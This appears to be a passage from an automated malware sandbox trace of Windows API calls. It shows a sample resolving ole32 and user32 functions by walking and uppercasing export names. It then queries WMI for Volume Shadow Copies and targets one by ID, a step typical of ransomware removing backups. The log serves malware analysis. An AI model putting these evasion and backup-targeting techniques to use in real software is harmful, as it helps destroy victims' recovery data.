(lpString="COGETINTERCEPTORFROMTYPEINFO") returned 28 [0051.752] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetInterfaceAndReleaseStream" | out: lpString1="CoGetInterfaceAndReleaseStream") returned="CoGetInterfaceAndReleaseStream" [0051.752] lstrlenA (lpString="COGETINTERFACEANDRELEASESTREAM") returned 30 [0051.752] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetMalloc" | out: lpString1="CoGetMalloc") returned="CoGetMalloc" [0051.752] lstrlenA (lpString="COGETMALLOC") returned 11 [0051.752] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetMarshalSizeMax" | out: lpString1="CoGetMarshalSizeMax") returned="CoGetMarshalSizeMax" [0051.752] lstrlenA (lpString="COGETMARSHALSIZEMAX") returned 19 [0051.752] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetModuleType" | out: lpString1="CoGetModuleType") returned="CoGetModuleType" [0051.752] lstrlenA (lpString="COGETMODULETYPE") returned 15 [0051.752] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetObject" | out: lpString1="CoGetObject") returned="CoGetObject" [0051.752] lstrlenA (lpString="COGETOBJECT") returned 11 [0051.752] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetObjectContext" | out: lpString1="CoGetObjectContext") returned="CoGetObjectContext" [0051.752] lstrlenA (lpString="COGETOBJECTCONTEXT") returned 18 [0051.752] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetPSClsid" | out: lpString1="CoGetPSClsid") returned="CoGetPSClsid" [0051.752] lstrlenA (lpString="COGETPSCLSID") returned 12 [0051.752] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetProcessIdentifier" | out: lpString1="CoGetProcessIdentifier") returned="CoGetProcessIdentifier" [0051.752] lstrlenA (lpString="COGETPROCESSIDENTIFIER") returned 22 [0051.752] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetStandardMarshal" | out: lpString1="CoGetStandardMarshal") returned="CoGetStandardMarshal" [0051.752] lstrlenA (lpString="COGETSTANDARDMARSHAL") returned 20 [0051.752] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetStdMarshalEx" | out: lpString1="CoGetStdMarshalEx") returned="CoGetStdMarshalEx" [0051.752] lstrlenA (lpString="COGETSTDMARSHALEX") returned 17 [0051.752] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetSystemSecurityPermissions" | out: lpString1="CoGetSystemSecurityPermissions") returned="CoGetSystemSecurityPermissions" [0051.752] lstrlenA (lpString="COGETSYSTEMSECURITYPERMISSIONS") returned 30 [0051.752] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetTreatAsClass" | out: lpString1="CoGetTreatAsClass") returned="CoGetTreatAsClass" [0051.752] lstrlenA (lpString="COGETTREATASCLASS") returned 17 [0051.752] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoImpersonateClient" | out: lpString1="CoImpersonateClient") returned="CoImpersonateClient" [0051.752] lstrlenA (lpString="COIMPERSONATECLIENT") returned 19 [0051.753] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoInitialize" | out: lpString1="CoInitialize") returned="CoInitialize" [0051.753] lstrlenA (lpString="COINITIALIZE") returned 12 [0051.753] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoInitializeEx" | out: lpString1="CoInitializeEx") returned="CoInitializeEx" [0051.753] lstrlenA (lpString="COINITIALIZEEX") returned 14 [0051.753] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoInitializeSecurity" | out: lpString1="CoInitializeSecurity") returned="CoInitializeSecurity" [0051.753] lstrlenA (lpString="COINITIALIZESECURITY") returned 20 [0051.753] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoInitializeWOW" | out: lpString1="CoInitializeWOW") returned="CoInitializeWOW" [0051.753] lstrlenA (lpString="COINITIALIZEWOW") returned 15 [0051.753] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoInstall" | out: lpString1="CoInstall") returned="CoInstall" [0051.753] lstrlenA (lpString="COINSTALL") returned 9 [0051.753] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoInvalidateRemoteMachineBindings" | out: lpString1="CoInvalidateRemoteMachineBindings") returned="CoInvalidateRemoteMachineBindings" [0051.753] lstrlenA (lpString="COINVALIDATEREMOTEMACHINEBINDINGS") returned 33 [0051.753] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoIsHandlerConnected" | out: lpString1="CoIsHandlerConnected") returned="CoIsHandlerConnected" [0051.753] lstrlenA (lpString="COISHANDLERCONNECTED") returned 20 [0051.753] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoIsOle1Class" | out: lpString1="CoIsOle1Class") returned="CoIsOle1Class" [0051.753] lstrlenA (lpString="COISOLE1CLASS") returned 13 [0051.753] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoLoadLibrary" | out: lpString1="CoLoadLibrary") returned="CoLoadLibrary" [0051.753] lstrlenA (lpString="COLOADLIBRARY") returned 13 [0051.753] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoLockObjectExternal" | out: lpString1="CoLockObjectExternal") returned="CoLockObjectExternal" [0051.753] lstrlenA (lpString="COLOCKOBJECTEXTERNAL") returned 20 [0051.753] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoMarshalHresult" | out: lpString1="CoMarshalHresult") returned="CoMarshalHresult" [0051.753] lstrlenA (lpString="COMARSHALHRESULT") returned 16 [0051.753] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoMarshalInterThreadInterfaceInStream" | out: lpString1="CoMarshalInterThreadInterfaceInStream") returned="CoMarshalInterThreadInterfaceInStream" [0051.753] lstrlenA (lpString="COMARSHALINTERTHREADINTERFACEINSTREAM") returned 37 [0051.753] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoMarshalInterface" | out: lpString1="CoMarshalInterface") returned="CoMarshalInterface" [0051.753] lstrlenA (lpString="COMARSHALINTERFACE") returned 18 [0051.753] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoPopServiceDomain" | out: lpString1="CoPopServiceDomain") returned="CoPopServiceDomain" [0051.753] lstrlenA (lpString="COPOPSERVICEDOMAIN") returned 18 [0051.753] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoPushServiceDomain" | out: lpString1="CoPushServiceDomain") returned="CoPushServiceDomain" [0051.753] lstrlenA (lpString="COPUSHSERVICEDOMAIN") returned 19 [0051.753] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoQueryAuthenticationServices" | out: lpString1="CoQueryAuthenticationServices") returned="CoQueryAuthenticationServices" [0051.753] lstrlenA (lpString="COQUERYAUTHENTICATIONSERVICES") returned 29 [0051.753] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoQueryClientBlanket" | out: lpString1="CoQueryClientBlanket") returned="CoQueryClientBlanket" [0051.753] lstrlenA (lpString="COQUERYCLIENTBLANKET") returned 20 [0051.753] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoQueryProxyBlanket" | out: lpString1="CoQueryProxyBlanket") returned="CoQueryProxyBlanket" [0051.754] lstrlenA (lpString="COQUERYPROXYBLANKET") returned 19 [0051.754] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoQueryReleaseObject" | out: lpString1="CoQueryReleaseObject") returned="CoQueryReleaseObject" [0051.754] lstrlenA (lpString="COQUERYRELEASEOBJECT") returned 20 [0051.754] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoReactivateObject" | out: lpString1="CoReactivateObject") returned="CoReactivateObject" [0051.754] lstrlenA (lpString="COREACTIVATEOBJECT") returned 18 [0051.754] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoRegisterChannelHook" | out: lpString1="CoRegisterChannelHook") returned="CoRegisterChannelHook" [0051.754] lstrlenA (lpString="COREGISTERCHANNELHOOK") returned 21 [0051.754] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoRegisterClassObject" | out: lpString1="CoRegisterClassObject") returned="CoRegisterClassObject" [0051.754] lstrlenA (lpString="COREGISTERCLASSOBJECT") returned 21 [0051.754] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoRegisterInitializeSpy" | out: lpString1="CoRegisterInitializeSpy") returned="CoRegisterInitializeSpy" [0051.754] lstrlenA (lpString="COREGISTERINITIALIZESPY") returned 23 [0051.754] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoRegisterMallocSpy" | out: lpString1="CoRegisterMallocSpy") returned="CoRegisterMallocSpy" [0051.754] lstrlenA (lpString="COREGISTERMALLOCSPY") returned 19 [0051.754] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoRegisterMessageFilter" | out: lpString1="CoRegisterMessageFilter") returned="CoRegisterMessageFilter" [0051.754] lstrlenA (lpString="COREGISTERMESSAGEFILTER") returned 23 [0051.754] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoRegisterPSClsid" | out: lpString1="CoRegisterPSClsid") returned="CoRegisterPSClsid" [0051.754] lstrlenA (lpString="COREGISTERPSCLSID") returned 17 [0051.754] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoRegisterSurrogate" | out: lpString1="CoRegisterSurrogate") returned="CoRegisterSurrogate" [0051.754] lstrlenA (lpString="COREGISTERSURROGATE") returned 19 [0051.754] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoRegisterSurrogateEx" | out: lpString1="CoRegisterSurrogateEx") returned="CoRegisterSurrogateEx" [0051.754] lstrlenA (lpString="COREGISTERSURROGATEEX") returned 21 [0051.754] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoReleaseMarshalData" | out: lpString1="CoReleaseMarshalData") returned="CoReleaseMarshalData" [0051.754] lstrlenA (lpString="CORELEASEMARSHALDATA") returned 20 [0051.754] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoReleaseServerProcess" | out: lpString1="CoReleaseServerProcess") returned="CoReleaseServerProcess" [0051.754] lstrlenA (lpString="CORELEASESERVERPROCESS") returned 22 [0051.754] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoResumeClassObjects" | out: lpString1="CoResumeClassObjects") returned="CoResumeClassObjects" [0051.754] lstrlenA (lpString="CORESUMECLASSOBJECTS") returned 20 [0051.754] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoRetireServer" | out: lpString1="CoRetireServer") returned="CoRetireServer" [0051.754] lstrlenA (lpString="CORETIRESERVER") returned 14 [0051.754] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoRevertToSelf" | out: lpString1="CoRevertToSelf") returned="CoRevertToSelf" [0051.754] lstrlenA (lpString="COREVERTTOSELF") returned 14 [0051.754] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoRevokeClassObject" | out: lpString1="CoRevokeClassObject") returned="CoRevokeClassObject" [0051.754] lstrlenA (lpString="COREVOKECLASSOBJECT") returned 19 [0051.754] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoRevokeInitializeSpy" | out: lpString1="CoRevokeInitializeSpy") returned="CoRevokeInitializeSpy" [0051.754] lstrlenA (lpString="COREVOKEINITIALIZESPY") returned 21 [0051.754] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoRevokeMallocSpy" | out: lpString1="CoRevokeMallocSpy") returned="CoRevokeMallocSpy" [0051.754] lstrlenA (lpString="COREVOKEMALLOCSPY") returned 17 [0051.754] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoSetCancelObject" | out: lpString1="CoSetCancelObject") returned="CoSetCancelObject" [0051.754] lstrlenA (lpString="COSETCANCELOBJECT") returned 17 [0051.754] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoSetProxyBlanket" | out: lpString1="CoSetProxyBlanket") returned="CoSetProxyBlanket" [0051.755] lstrlenA (lpString="COSETPROXYBLANKET") returned 17 [0051.755] CoSetProxyBlanket (pProxy=0x31d0e4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x3, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0051.755] IWbemServices:ExecQuery (in: This=0x31d0e4, strQueryLanguage="WQL", strQuery="select * from Win32_Shado", lFlags=48, pCtx=0x0, ppEnum=0xc9f1a0 | out: ppEnum=0xc9f1a0*=0x31d184) returned 0x0 [0051.768] IEnumWbemClassObject:Next (in: This=0x31d184, lTimeout=-1, uCount=0x1, apObjects=0xc9f19c, puReturned=0xc9f18c | out: apObjects=0xc9f19c*=0x31d1c0, puReturned=0xc9f18c*=0x1) returned 0x0 [0053.563] IWbemClassObject:Get (in: This=0x31d1c0, wszName="id", lFlags=0, pVal=0xc9f1a8*(varType=0x0, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1=0x40, varVal2=0x5d7480), pType=0x0, plFlavor=0x0 | out: pVal=0xc9f1a8*(varType=0x8, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1="{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}", varVal2=0x5d7480), pType=0x0, plFlavor=0x0) returned 0x0 [0053.563] lstrlenW (lpString="Win32_ShadowCopy.id='%s'") returned 24 [0053.564] lstrlenW (lpString="{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}") returned 38 [0053.567] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0xf10000 [0053.570] lstrlenA (lpString="user32.dll") returned 10 [0053.570] GetModuleHandleA (lpModuleName="user32.dll") returned 0x74f40000 [0053.570] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ActivateKeyboardLayout" | out: lpString1="ActivateKeyboardLayout") returned="ActivateKeyboardLayout" [0053.570] lstrlenA (lpString="ACTIVATEKEYBOARDLAYOUT") returned 22 [0053.570] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="AddClipboardFormatListener" | out: lpString1="AddClipboardFormatListener") returned="AddClipboardFormatListener" [0053.570] lstrlenA (lpString="ADDCLIPBOARDFORMATLISTENER") returned 26 [0053.570] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="AdjustWindowRect" | out: lpString1="AdjustWindowRect") returned="AdjustWindowRect" [0053.571] lstrlenA (lpString="ADJUSTWINDOWRECT") returned 16 [0053.571] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="AdjustWindowRectEx" | out: lpString1="AdjustWindowRectEx") returned="AdjustWindowRectEx" [0053.571] lstrlenA (lpString="ADJUSTWINDOWRECTEX") returned 18 [0053.571] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="AlignRects" | out: lpString1="AlignRects") returned="AlignRects" [0053.571] lstrlenA (lpString="ALIGNRECTS") returned 10 [0053.571] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="AllowForegroundActivation" | out: lpString1="AllowForegroundActivation") returned="AllowForegroundActivation" [0053.571] lstrlenA (lpString="ALLOWFOREGROUNDACTIVATION") returned 25 [0053.571] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="AllowSetForegroundWindow" | out: lpString1="AllowSetForegroundWindow") returned="AllowSetForegroundWindow" [0053.571] lstrlenA (lpString="ALLOWSETFOREGROUNDWINDOW") returned 24 [0053.571] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="AnimateWindow" | out: lpString1="AnimateWindow") returned="AnimateWindow" [0053.571] lstrlenA (lpString="ANIMATEWINDOW") returned 13 [0053.571] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="AnyPopup" | out: lpString1="AnyPopup") returned="AnyPopup" [0053.571] lstrlenA (lpString="ANYPOPUP") returned 8 [0053.571] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="AppendMenuA" | out: lpString1="AppendMenuA") returned="AppendMenuA" [0053.571] lstrlenA (lpString="APPENDMENUA") returned 11 [0053.571] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="AppendMenuW" | out: lpString1="AppendMenuW") returned="AppendMenuW" [0053.571] lstrlenA (lpString="APPENDMENUW") returned 11 [0053.571] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ArrangeIconicWindows" | out: lpString1="ArrangeIconicWindows") returned="ArrangeIconicWindows" [0053.571] lstrlenA (lpString="ARRANGEICONICWINDOWS") returned 20 [0053.571] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="AttachThreadInput" | out: lpString1="AttachThreadInput") returned="AttachThreadInput" [0053.571] lstrlenA (lpString="ATTACHTHREADINPUT") returned 17 [0053.571] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="BeginDeferWindowPos" | out: lpString1="BeginDeferWindowPos") returned="BeginDeferWindowPos" [0053.571] lstrlenA (lpString="BEGINDEFERWINDOWPOS") returned 19 [0053.571] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="BeginPaint" | out: lpString1="BeginPaint") returned="BeginPaint" [0053.571] lstrlenA (lpString="BEGINPAINT") returned 10 [0053.571] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="BlockInput" | out: lpString1="BlockInput") returned="BlockInput" [0053.571] lstrlenA (lpString="BLOCKINPUT") returned 10 [0053.571] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="BringWindowToTop" | out: lpString1="BringWindowToTop") returned="BringWindowToTop" [0053.571] lstrlenA (lpString="BRINGWINDOWTOTOP") returned 16 [0053.571] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="BroadcastSystemMessage" | out: lpString1="BroadcastSystemMessage") returned="BroadcastSystemMessage" [0053.571] lstrlenA (lpString="BROADCASTSYSTEMMESSAGE") returned 22 [0053.571] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="BroadcastSystemMessageA" | out: lpString1="BroadcastSystemMessageA") returned="BroadcastSystemMessageA" [0053.571] lstrlenA (lpString="BROADCASTSYSTEMMESSAGEA") returned 23 [0053.571] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="BroadcastSystemMessageExA" | out: lpString1="BroadcastSystemMessageExA") returned="BroadcastSystemMessageExA" [0053.571] lstrlenA (lpString="BROADCASTSYSTEMMESSAGEEXA") returned 25 [0053.571] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="BroadcastSystemMessageExW" | out: lpString1="BroadcastSystemMessageExW") returned="BroadcastSystemMessageExW" [0053.571] lstrlenA (lpString="BROADCASTSYSTEMMESSAGEEXW") returned 25 [0053.572] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="BroadcastSystemMessageW" | out: lpString1="BroadcastSystemMessageW") returned="BroadcastSystemMessageW" [0053.572] lstrlenA (lpString="BROADCASTSYSTEMMESSAGEW") returned 23 [0053.572] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="BuildReasonArray" | out: lpString1="BuildReasonArray") returned="BuildReasonArray" [0053.572] lstrlenA (lpString="BUILDREASONARRAY") returned 16 [0053.572] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CalcMenuBar" | out: lpString1="CalcMenuBar") returned="CalcMenuBar" [0053.572] lstrlenA (lpString="CALCMENUBAR") returned 11 [0053.572] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CalculatePopupWindowPosition" | out: lpString1="CalculatePopupWindowPosition") returned="CalculatePopupWindowPosition" [0053.572] lstrlenA (lpString="CALCULATEPOPUPWINDOWPOSITION") returned 28 [0053.572] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CallMsgFilter" | out: lpString1="CallMsgFilter") returned="CallMsgFilter" [0053.572] lstrlenA (lpString="CALLMSGFILTER") returned 13 [0053.572] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CallMsgFilterA" | out: lpString1="CallMsgFilterA") returned="CallMsgFilterA" [0053.572] lstrlenA (lpString="CALLMSGFILTERA") returned 14 [0053.572] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CallMsgFilterW" | out: lpString1="CallMsgFilterW") returned="CallMsgFilterW" [0053.572] lstrlenA (lpString="CALLMSGFILTERW") returned 14 [0053.572] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CallNextHookEx" | out: lpString1="CallNextHookEx") returned="CallNextHookEx" [0053.572] lstrlenA (lpString="CALLNEXTHOOKEX") returned 14 [0053.572] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CallWindowProcA" | out: lpString1="CallWindowProcA") returned="CallWindowProcA" [0053.572] lstrlenA (lpString="CALLWINDOWPROCA") returned 15 [0053.572] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CallWindowProcW" | out: lpString1="CallWindowProcW") returned="CallWindowProcW" [0053.572] lstrlenA (lpString="CALLWINDOWPROCW") returned 15 [0053.572] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CancelShutdown" | out: lpString1="CancelShutdown") returned="CancelShutdown" [0053.572] lstrlenA (lpString="CANCELSHUTDOWN") returned 14 [0053.572] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CascadeChildWindows" | out: lpString1="CascadeChildWindows") returned="CascadeChildWindows" [0053.572] lstrlenA (lpString="CASCADECHILDWINDOWS") returned 19 [0053.572] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CascadeWindows" | out: lpString1="CascadeWindows") returned="CascadeWindows" [0053.572] lstrlenA (lpString="CASCADEWINDOWS") returned 14 [0053.572] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ChangeClipboardChain" | out: lpString1="ChangeClipboardChain") returned="ChangeClipboardChain" [0053.572] lstrlenA (lpString="CHANGECLIPBOARDCHAIN") returned 20 [0053.572] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ChangeDisplaySettingsA" | out: lpString1="ChangeDisplaySettingsA") returned="ChangeDisplaySettingsA" [0053.572] lstrlenA (lpString="CHANGEDISPLAYSETTINGSA") returned 22 [0053.572] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ChangeDisplaySettingsExA" | out: lpString1="ChangeDisplaySettingsExA") returned="ChangeDisplaySettingsExA" [0053.572] lstrlenA (lpString="CHANGEDISPLAYSETTINGSEXA") returned 24 [0053.572] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ChangeDisplaySettingsExW" | out: lpString1="ChangeDisplaySettingsExW") returned="ChangeDisplaySettingsExW" [0053.572] lstrlenA (lpString="CHANGEDISPLAYSETTINGSEXW") returned 24 [0053.572] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ChangeDisplaySettingsW" | out: lpString1="ChangeDisplaySettingsW") returned="ChangeDisplaySettingsW" [0053.572] lstrlenA (lpString="CHANGEDISPLAYSETTINGSW") returned 22 [0053.572] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ChangeMenuA" | out: lpString1="ChangeMenuA") returned="ChangeMenuA" [0053.573] lstrlenA (lpString="CHANGEMENUA") returned 11 [0053.573] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ChangeMenuW" | out: lpString1="ChangeMenuW") returned="ChangeMenuW" [0053.573] lstrlenA (lpString="CHANGEMENUW") returned 11 [0053.573] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ChangeWindowMessageFilter" | out: lpString1="ChangeWindowMessageFilter") returned="ChangeWindowMessageFilter" [0053.573] lstrlenA (lpString="CHANGEWINDOWMESSAGEFILTER") returned 25 [0053.573] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ChangeWindowMessageFilterEx" | out: lpString1="ChangeWindowMessageFilterEx") returned="ChangeWindowMessageFilterEx" [0053.573] lstrlenA (lpString="CHANGEWINDOWMESSAGEFILTEREX") returned 27 [0053.573] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharLowerA" | out: lpString1="CharLowerA") returned="CharLowerA" [0053.573] lstrlenA (lpString="CHARLOWERA") returned 10 [0053.573] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharLowerBuffA" | out: lpString1="CharLowerBuffA") returned="CharLowerBuffA" [0053.573] lstrlenA (lpString="CHARLOWERBUFFA") returned 14 [0053.573] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharLowerBuffW" | out: lpString1="CharLowerBuffW") returned="CharLowerBuffW" [0053.573] lstrlenA (lpString="CHARLOWERBUFFW") returned 14 [0053.573] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharLowerW" | out: lpString1="CharLowerW") returned="CharLowerW" [0053.573] lstrlenA (lpString="CHARLOWERW") returned 10 [0053.573] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharNextA" | out: lpString1="CharNextA") returned="CharNextA" [0053.573] lstrlenA (lpString="CHARNEXTA") returned 9 [0053.573] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharNextExA" | out: lpString1="CharNextExA") returned="CharNextExA" [0053.573] lstrlenA (lpString="CHARNEXTEXA") returned 11 [0053.573] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharNextW" | out: lpString1="CharNextW") returned="CharNextW" [0053.573] lstrlenA (lpString="CHARNEXTW") returned 9 [0053.573] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharPrevA" | out: lpString1="CharPrevA") returned="CharPrevA" [0053.573] lstrlenA (lpString="CHARPREVA") returned 9 [0053.573] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharPrevExA" | out: lpString1="CharPrevExA") returned="CharPrevExA" [0053.573] lstrlenA (lpString="CHARPREVEXA") returned 11 [0053.573] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharPrevW" | out: lpString1="CharPrevW") returned="CharPrevW" [0053.573] lstrlenA (lpString="CHARPREVW") returned 9 [0053.573] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharToOemA" | out: lpString1="CharToOemA") returned="CharToOemA" [0053.573] lstrlenA (lpString="CHARTOOEMA") returned 10 [0053.573] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharToOemBuffA" | out: lpString1="CharToOemBuffA") returned="CharToOemBuffA" [0053.573] lstrlenA (lpString="CHARTOOEMBUFFA") returned 14 [0053.573] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharToOemBuffW" | out: lpString1="CharToOemBuffW") returned="CharToOemBuffW" [0053.573] lstrlenA (lpString="CHARTOOEMBUFFW") returned 14 [0053.573] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharToOemW" | out: lpString1="CharToOemW") returned="CharToOemW" [0053.573] lstrlenA (lpString="CHARTOOEMW") returned 10 [0053.573] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharUpperA" | out: lpString1="CharUpperA") returned="CharUpperA" [0053.573] lstrlenA (lpString="CHARUPPERA") returned 10 [0053.574] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharUpperBuffA" | out: lpString1="CharUpperBuffA") returned="CharUpperBuffA" [0053.574] lstrlenA (lpString="CHARUPPERBUFFA") returned 14 [0053.574] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharUpperBuffW" | out: lpString1="CharUpperBuffW") returned="CharUpperBuffW" [0053.574] lstrlenA (lpString="CHARUPPERBUFFW") returned 14 [0053.574] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharUpperW" | out: lpString1="CharUpperW") returned="CharUpperW" [0053.574] lstrlenA (lpString="CHARUPPERW") returned 10 [0053.574] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CheckDesktopByThreadId" | out: lpString1="CheckDesktopByThreadId") returned="CheckDesktopByThreadId" [0053.574] lstrlenA (lpString="CHECKDESKTOPBYTHREADID") returned 22 [0053.574] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CheckDlgButton" | out: lpString1="CheckDlgButton") returned="CheckDlgButton" [0053.574] lstrlenA (lpString="CHECKDLGBUTTON") returned 14 [0053.574] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CheckMenuItem" | out: lpString1="CheckMenuItem") returned="CheckMenuItem" [0053.574] lstrlenA (lpString="CHECKMENUITEM") returned 13 [0053.574] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CheckMenuRadioItem" | out: lpString1="CheckMenuRadioItem") returned="CheckMenuRadioItem" [0053.574] lstrlenA (lpString="CHECKMENURADIOITEM") returned 18 [0053.574] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CheckRadioButton" | out: lpString1="CheckRadioButton") returned="CheckRadioButton" [0053.574] lstrlenA (lpString="CHECKRADIOBUTTON") returned 16 [0053.574] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CheckWindowThreadDesktop" | out: lpString1="CheckWindowThreadDesktop") returned="CheckWindowThreadDesktop" [0053.574] lstrlenA (lpString="CHECKWINDOWTHREADDESKTOP") returned 24 [0053.574] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ChildWindowFromPoint" | out: lpString1="ChildWindowFromPoint") returned="ChildWindowFromPoint" [0053.574] lstrlenA (lpString="CHILDWINDOWFROMPOINT") returned 20 [0053.574] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ChildWindowFromPointEx" | out: lpString1="ChildWindowFromPointEx") returned="ChildWindowFromPointEx" [0053.574] lstrlenA (lpString="CHILDWINDOWFROMPOINTEX") returned 22 [0053.574] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CliImmSetHotKey" | out: lpString1="CliImmSetHotKey") returned="CliImmSetHotKey" [0053.574] lstrlenA (lpString="CLIIMMSETHOTKEY") returned 15 [0053.574] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ClientThreadSetup" | out: lpString1="ClientThreadSetup") returned="ClientThreadSetup" [0053.574] lstrlenA (lpString="CLIENTTHREADSETUP") returned 17 [0053.574] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ClientToScreen" | out: lpString1="ClientToScreen") returned="ClientToScreen" [0053.574] lstrlenA (lpString="CLIENTTOSCREEN") returned 14 [0053.574] 